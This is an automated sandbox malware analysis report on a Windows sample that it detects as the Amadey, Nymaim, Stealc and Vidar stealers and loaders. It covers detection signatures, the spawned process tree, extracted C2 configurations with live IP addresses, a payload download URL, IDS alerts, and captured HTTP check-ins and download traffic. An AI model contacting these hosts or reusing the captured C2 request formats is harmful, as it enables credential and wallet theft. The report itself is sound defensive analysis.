Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1564522
MD5:45a44e016967a33a277601951d2b5e0d
SHA1:b8597c8004c973d34b1c3a72d93525b53ae28f9e
SHA256:549d3d44e4c8d9d5af2df736001d57a5794e0ef9428ae90fe54a574739356435
Tags:exeuser-Bitsight
Infos:

Detection

Amadey, Nymaim, Stealc, Vidar
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Amadeys stealer DLL
Yara detected Nymaim
Yara detected Powershell download and execute
Yara detected Stealc
Yara detected Vidar stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Drops PE files to the document folder of the user
Drops PE files to the user root directory
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
Machine Learning detection for dropped file
Machine Learning detection for sample
PE file contains section with special chars
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Tries to steal Mail credentials (via file / registry access)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates job files (autostart)
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Drops PE files to the user directory
Entry point lies outside standard sections
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • file.exe (PID: 7732 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 45A44E016967A33A277601951D2B5E0D)
    • cmd.exe (PID: 768 cmdline: "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\DocumentsIIEBGIDAAF.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 5504 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • DocumentsIIEBGIDAAF.exe (PID: 1296 cmdline: "C:\Users\user\DocumentsIIEBGIDAAF.exe" MD5: 9E221BE6B28A24EC318E27C499DA8C8F)
        • skotes.exe (PID: 4124 cmdline: "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe" MD5: 9E221BE6B28A24EC318E27C499DA8C8F)
  • skotes.exe (PID: 6780 cmdline: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe MD5: 9E221BE6B28A24EC318E27C499DA8C8F)
  • skotes.exe (PID: 4640 cmdline: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe MD5: 9E221BE6B28A24EC318E27C499DA8C8F)
    • 607f096cd3.exe (PID: 3136 cmdline: "C:\Users\user\AppData\Local\Temp\1009881001\607f096cd3.exe" MD5: B2D9E9B305C92045DFDF886CF0287182)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
AmadeyAmadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.amadey
NameDescriptionAttributionBlogpost URLsLink
NymaimNymaim is a trojan downloader. It downloads (and runs) other malware on affected systems and was one of the primary malware families hosted on Avalanche. Nymaim is different in that it displays a localized lockscreen while it downloads additional malware. Nymaim is usually delivered by exploit kits and malvertising.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.nymaim
NameDescriptionAttributionBlogpost URLsLink
StealcStealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.stealc
NameDescriptionAttributionBlogpost URLsLink
VidarVidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.vidar
{"C2 url": "http://185.215.113.206/c4becf79229cb002.php"}
{"C2 url": "185.215.113.43/Zu7JuNko/index.php", "Version": "4.42", "Install Folder": "abc3bc1985", "Install File": "skotes.exe"}
{"C2 addresses": ["185.156.72.65", "185.156.72.65", "185.156.72.65", "185.156.72.65"]}
SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_Stealc_1Yara detected StealcJoe Security
    SourceRuleDescriptionAuthorStrings
    00000001.00000003.1441862159.0000000004E90000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
      00000001.00000002.1955784660.0000000000651000.00000040.00000001.01000000.00000003.sdmpJoeSecurity_StealcYara detected StealcJoe Security
        0000000A.00000003.1997212194.0000000004880000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
          0000000E.00000002.2675683661.0000000004950000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_NymaimYara detected NymaimJoe Security
            0000000E.00000002.2675683661.0000000004950000.00000040.00001000.00020000.00000000.sdmpWindows_Trojan_Smokeloader_3687686funknownunknown
            • 0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
            Click to see the 14 entries
            SourceRuleDescriptionAuthorStrings
            14.2.607f096cd3.exe.400000.0.raw.unpackJoeSecurity_NymaimYara detected NymaimJoe Security
              14.2.607f096cd3.exe.4950e67.1.raw.unpackJoeSecurity_NymaimYara detected NymaimJoe Security
                14.2.607f096cd3.exe.400000.0.unpackJoeSecurity_NymaimYara detected NymaimJoe Security
                  14.3.607f096cd3.exe.4a40000.0.raw.unpackJoeSecurity_NymaimYara detected NymaimJoe Security
                    12.2.skotes.exe.e0000.0.unpackJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
                      Click to see the 3 entries
                      No Sigma rule has matched
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-11-28T13:10:48.928209+010020442441Malware Command and Control Activity Detected192.168.2.849706185.215.113.20680TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-11-28T13:10:50.595613+010020442461Malware Command and Control Activity Detected192.168.2.849709185.215.113.20680TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-11-28T13:10:52.143290+010020442481Malware Command and Control Activity Detected192.168.2.849709185.215.113.20680TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-11-28T13:10:50.717588+010020442471Malware Command and Control Activity Detected185.215.113.20680192.168.2.849709TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-11-28T13:10:20.879149+010020442431Malware Command and Control Activity Detected192.168.2.849706185.215.113.20680TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-11-28T13:12:06.964987+010028561471A Network Trojan was detected192.168.2.849714185.215.113.4380TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-11-28T13:10:04.994826+010028561221A Network Trojan was detected185.215.113.4380192.168.2.849715TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-11-28T13:12:11.521406+010028033053Unknown Traffic192.168.2.84971631.41.244.1180TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-11-28T13:10:52.999060+010028033043Unknown Traffic192.168.2.849709185.215.113.20680TCP
                      2024-11-28T13:10:59.822058+010028033043Unknown Traffic192.168.2.849710185.215.113.1680TCP

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection

                      barindex
                      Source: file.exeAvira: detected
                      Source: http://185.215.113.206/C-2Avira URL Cloud: Label: malware
                      Source: http://31.41.244.11/files/unique2/random.exeAvira URL Cloud: Label: malware
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeAvira: detection malicious, Label: TR/Crypt.TPM.Gen
                      Source: C:\Users\user\DocumentsIIEBGIDAAF.exeAvira: detection malicious, Label: TR/Crypt.TPM.Gen
                      Source: 0000000A.00000003.1997212194.0000000004880000.00000004.00001000.00020000.00000000.sdmpMalware Configuration Extractor: Amadey {"C2 url": "185.215.113.43/Zu7JuNko/index.php", "Version": "4.42", "Install Folder": "abc3bc1985", "Install File": "skotes.exe"}
                      Source: 00000001.00000002.1957372627.000000000100E000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: StealC {"C2 url": "http://185.215.113.206/c4becf79229cb002.php"}
                      Source: 14.3.607f096cd3.exe.4a40000.0.raw.unpackMalware Configuration Extractor: Nymaim {"C2 addresses": ["185.156.72.65", "185.156.72.65", "185.156.72.65", "185.156.72.65"]}
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NCK9WNDU\random[1].exeReversingLabs: Detection: 28%
                      Source: C:\Users\user\AppData\Local\Temp\1009881001\607f096cd3.exeReversingLabs: Detection: 28%
                      Source: file.exeReversingLabs: Detection: 47%
                      Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeJoe Sandbox ML: detected
                      Source: C:\Users\user\DocumentsIIEBGIDAAF.exeJoe Sandbox ML: detected
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NCK9WNDU\random[1].exeJoe Sandbox ML: detected
                      Source: C:\Users\user\AppData\Local\Temp\1009881001\607f096cd3.exeJoe Sandbox ML: detected
                      Source: file.exeJoe Sandbox ML: detected
                      Source: C:\Users\user\AppData\Local\Temp\1009881001\607f096cd3.exeCode function: 14_2_004035D0 CryptAcquireContextW,CryptCreateHash,CryptHashData,GetLastError,CryptDeriveKey,GetLastError,CryptReleaseContext,CryptDecrypt,CryptDestroyKey,14_2_004035D0
                      Source: C:\Users\user\AppData\Local\Temp\1009881001\607f096cd3.exeCode function: 14_2_04953837 CryptAcquireContextW,CryptCreateHash,CryptHashData,GetLastError,CryptDeriveKey,GetLastError,CryptReleaseContext,CryptDecrypt,CryptDestroyKey,14_2_04953837
                      Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: C:\Users\user\AppData\Local\Temp\1009881001\607f096cd3.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1009881001\607f096cd3.exeCode function: 14_2_00417727 FindFirstFileExW,14_2_00417727
                      Source: C:\Users\user\AppData\Local\Temp\1009881001\607f096cd3.exeCode function: 14_2_0496798E FindFirstFileExW,14_2_0496798E

                      Networking

                      barindex
                      Source: Network trafficSuricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.8:49706 -> 185.215.113.206:80
                      Source: Network trafficSuricata IDS: 2044244 - Severity 1 - ET MALWARE Win32/Stealc Requesting browsers Config from C2 : 192.168.2.8:49706 -> 185.215.113.206:80
                      Source: Network trafficSuricata IDS: 2044246 - Severity 1 - ET MALWARE Win32/Stealc Requesting plugins Config from C2 : 192.168.2.8:49709 -> 185.215.113.206:80
                      Source: Network trafficSuricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 185.215.113.206:80 -> 192.168.2.8:49709
                      Source: Network trafficSuricata IDS: 2856147 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M3 : 192.168.2.8:49714 -> 185.215.113.43:80
                      Source: Network trafficSuricata IDS: 2044248 - Severity 1 - ET MALWARE Win32/Stealc Submitting System Information to C2 : 192.168.2.8:49709 -> 185.215.113.206:80
                      Source: Network trafficSuricata IDS: 2856122 - Severity 1 - ETPRO MALWARE Amadey CnC Response M1 : 185.215.113.43:80 -> 192.168.2.8:49715
                      Source: Malware configuration extractorURLs: http://185.215.113.206/c4becf79229cb002.php
                      Source: Malware configuration extractorIPs: 185.215.113.43
                      Source: Malware configuration extractorIPs: 185.156.72.65
                      Source: Malware configuration extractorIPs: 185.156.72.65
                      Source: Malware configuration extractorIPs: 185.156.72.65
                      Source: Malware configuration extractorIPs: 185.156.72.65
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 28 Nov 2024 12:10:52 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 11:30:30 GMTETag: "10e436-5e7ec6832a180"Accept-Ranges: bytesContent-Length: 1106998Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c 02 0d 00 d0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 84 25 0b 00 00 10 00 00 00 26 0b 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 7c 27 00 00 00 40 0b 00 00 28 00 00 00 2c 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 70 44 01 00 00 70 0b 00 00 46 01 00 00 54 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 28 08 00 00 00 c0 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 88 2a 00 00 00 d0 0c 00 00 2c 00 00 00 9a 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 d0 0c 00 00 00 00 0d 00 00 0e 00 00 00 c6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 2c 00 00 00 00 10 0d 00 00 02 00 00 00 d4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 20 0d 00 00 02 00 00 00 d6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 73 72 63 00 00 00 a8 04 00 00 00 30 0d 00 00 06 00 00 00 d8 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 18 3c 00 00 00 40 0d 00 00 3e 00 00 00 de 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 38 05 00 00 00 80 0d 00 00 06 00 00 00 1c 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 52 c8 00 00 00 90 0d 00 00 ca 00 00 00 22 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 31 00 00 00 00 00 5d 27 00 00 00 60 0e 00 00 28 00 00 00 ec 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 34 35 00 00 00 00 00 9a 2d 00 00 00 90 0e 00 00
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 28 Nov 2024 12:10:59 GMTContent-Type: application/octet-streamContent-Length: 1906176Last-Modified: Thu, 28 Nov 2024 11:49:11 GMTConnection: keep-aliveETag: "674858b7-1d1600"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a7 bb 2d 49 e3 da 43 1a e3 da 43 1a e3 da 43 1a b8 b2 40 1b ed da 43 1a b8 b2 46 1b 42 da 43 1a 36 b7 47 1b f1 da 43 1a 36 b7 40 1b f5 da 43 1a 36 b7 46 1b 96 da 43 1a b8 b2 47 1b f7 da 43 1a b8 b2 42 1b f0 da 43 1a e3 da 42 1a 35 da 43 1a 78 b4 4a 1b e2 da 43 1a 78 b4 bc 1a e2 da 43 1a 78 b4 41 1b e2 da 43 1a 52 69 63 68 e3 da 43 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 9c 56 f0 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 18 00 ea 04 00 00 98 01 00 00 00 00 00 00 a0 4b 00 00 10 00 00 00 00 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 d0 4b 00 00 04 00 00 1f a9 1d 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 57 a0 06 00 6b 00 00 00 00 90 06 00 44 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 89 4b 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 89 4b 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 80 06 00 00 10 00 00 00 de 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 44 03 00 00 00 90 06 00 00 04 00 00 00 ee 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 a0 06 00 00 02 00 00 00 f2 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 e0 2a 00 00 b0 06 00 00 02 00 00 00 f4 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 63 6c 64 7a 6f 63 6e 62 00 00 1a 00 00 90 31 00 00 fa 19 00 00 f6 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 72 76 69 79 65 7a 78 78 00 10 00 00 00 90 4b 00 00 04 00 00 00 f0 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 a0 4b 00 00 22 00 00 00 f4 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 28 Nov 2024 12:12:11 GMTContent-Type: application/octet-streamContent-Length: 2031104Last-Modified: Thu, 28 Nov 2024 11:14:19 GMTConnection: keep-aliveETag: "6748508b-1efe00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 f6 d9 52 43 b2 b8 3c 10 b2 b8 3c 10 b2 b8 3c 10 ac ea b8 10 ac b8 3c 10 ac ea a9 10 ad b8 3c 10 ac ea bf 10 cd b8 3c 10 95 7e 47 10 b1 b8 3c 10 b2 b8 3d 10 33 b8 3c 10 ac ea b6 10 b3 b8 3c 10 ac ea a8 10 b3 b8 3c 10 ac ea ad 10 b3 b8 3c 10 52 69 63 68 b2 b8 3c 10 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 18 5b c6 64 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 7c 05 00 00 ec 00 00 00 00 00 00 00 00 4c 00 00 10 00 00 00 90 05 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 30 4c 00 00 04 00 00 bd 35 1f 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 5b f0 06 00 6f 00 00 00 00 60 06 00 38 83 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 90 b3 4b 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 50 06 00 00 10 00 00 00 ae 03 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 38 83 00 00 00 60 06 00 00 3c 00 00 00 be 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 f0 06 00 00 02 00 00 00 fa 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 10 2a 00 00 00 07 00 00 02 00 00 00 fc 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 64 66 6f 79 72 72 6a 71 00 e0 1a 00 00 10 31 00 00 da 1a 00 00 fe 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 76 7a 78 68 6b 6e 69 6d 00 10 00 00 00 f0 4b 00 00 04 00 00 00 d8 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 00 4c 00 00 22 00 00 00 dc 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CFCFHJDBKJKEBFHJEHIIHost: 185.215.113.206Content-Length: 210Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 46 43 46 48 4a 44 42 4b 4a 4b 45 42 46 48 4a 45 48 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 33 30 38 38 46 39 39 43 39 38 36 33 37 34 38 31 34 30 37 33 31 0d 0a 2d 2d 2d 2d 2d 2d 43 46 43 46 48 4a 44 42 4b 4a 4b 45 42 46 48 4a 45 48 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6d 61 72 73 0d 0a 2d 2d 2d 2d 2d 2d 43 46 43 46 48 4a 44 42 4b 4a 4b 45 42 46 48 4a 45 48 49 49 2d 2d 0d 0a Data Ascii: ------CFCFHJDBKJKEBFHJEHIIContent-Disposition: form-data; name="hwid"3088F99C9863748140731------CFCFHJDBKJKEBFHJEHIIContent-Disposition: form-data; name="build"mars------CFCFHJDBKJKEBFHJEHII--
                      Source: global trafficHTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IJECAEHJJJKJKFIDGCBGHost: 185.215.113.206Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 4a 45 43 41 45 48 4a 4a 4a 4b 4a 4b 46 49 44 47 43 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 62 63 63 62 38 31 33 63 36 65 33 37 38 62 35 32 33 31 65 63 35 38 65 65 34 31 35 63 66 61 65 35 30 66 66 32 31 36 61 63 30 62 62 38 32 61 37 31 36 35 65 63 39 66 35 66 63 36 65 34 34 38 61 62 65 64 32 39 32 32 35 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 45 43 41 45 48 4a 4a 4a 4b 4a 4b 46 49 44 47 43 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 45 43 41 45 48 4a 4a 4a 4b 4a 4b 46 49 44 47 43 42 